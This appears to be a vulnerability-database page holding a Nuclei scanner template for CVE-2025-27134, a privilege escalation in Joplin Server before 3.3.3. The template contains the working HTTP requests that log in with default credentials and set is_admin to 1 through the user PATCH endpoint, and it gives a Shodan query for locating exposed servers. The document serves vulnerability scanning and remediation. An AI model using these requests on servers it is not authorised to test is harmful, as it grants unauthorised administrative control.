| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-27134 | 30 Apr 202515:48 | – | circl | |
| Joplin 安全漏洞 | 30 Apr 202500:00 | – | cnnvd | |
| CVE-2025-27134 | 30 Apr 202514:55 | – | cve | |
| CVE-2025-27134 Privilege escalation in Joplin server via user patch endpoint | 30 Apr 202514:55 | – | cvelist | |
| EUVD-2025-14844 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-27134 | 30 Apr 202515:16 | – | nvd | |
| CVE-2025-27134 Privilege escalation in Joplin server via user patch endpoint | 30 Apr 202514:55 | – | osv | |
| PT-2025-18288 · Joplin · Joplin | 30 Apr 202500:00 | – | ptsecurity | |
| CVE-2025-27134 | 2 May 202515:11 | – | redhatcve | |
| CVE-2025-27134 Privilege escalation in Joplin server via user patch endpoint | 30 Apr 202514:55 | – | vulnrichment |
id: CVE-2025-27134
info:
name: Joplin 3.3.3 Server - Privilege Escalation
author: zonia3000
severity: high
description: |
Joplin is a free, open source note taking and to-do application, which can handle a large number of notes organised into notebooks. Prior to version 3.3.3, a privilege escalation vulnerability exists in the Joplin server, allowing non-admin users to exploit the API endpoint `PATCH /api/users/-id` to set the `is_admin` field to 1. The vulnerability allows malicious low-privileged users to perform administrative actions without proper authorization. This issue has been patched in version 3.3.3.
impact: |
Authenticated low-privileged users can escalate their privileges to administrator by setting the is_admin field through the PATCH /api/users endpoint, gaining complete control over the Joplin server.
remediation: |
Upgrade to Joplin version 3.3.3 or later that properly restricts the is_admin field modification.
reference:
- https://github.com/laurent22/joplin/security/advisories/GHSA-xj67-649m-3p8x
- https://nvd.nist.gov/vuln/detail/CVE-2025-27134
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2025-27134
cwe-id: CWE-284
epss-score: 0.01705
epss-percentile: 0.74502
cpe: cpe:2.3:a:joplin_project:joplin:*:*:*:*:*:-:*:*
metadata:
verified: true
vendor: joplin_project
product: joplin
framework: "-"
shodan-query: 'title:"Joplin Server"'
tags: cve,cve2025,auth,joplin,oss,default-login,vuln
variables:
username: admin@localhost
password: admin
http:
- raw:
- |
POST /api/sessions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"email": "{{username}}",
"password": "{{password}}"
}
- |
PATCH /api/users/{{user_id}} HTTP/1.1
Host: {{Hostname}}
Cookie: sessionId={{session_id}}
Content-Type: application/json
{ "is_admin": 1 }
- |
GET /api/users HTTP/1.1
Host: {{Hostname}}
Cookie: sessionId={{session_id}}
Content-Type: application/json
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body_1,"user_id") && contains(body_1,"id")'
- 'contains(user, "{{user_id}}")'
condition: and
extractors:
- type: json
part: body_1
name: user_id
json:
- '.user_id'
internal: true
- type: json
part: body_1
name: session_id
json:
- '.id'
internal: true
- type: json
name: user
part: body_3
json:
- '.items[] | select(.is_admin == 1) | .id'
# digest: 490a0046304402204290ffe7e17a8422115e3f52d94725d71b375263ff34b40b44b509567fce811802206ee25e1706678f0a0d9dcb12b2d9ad624cec5d6e6408276a41fc4bd42ea37dd9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation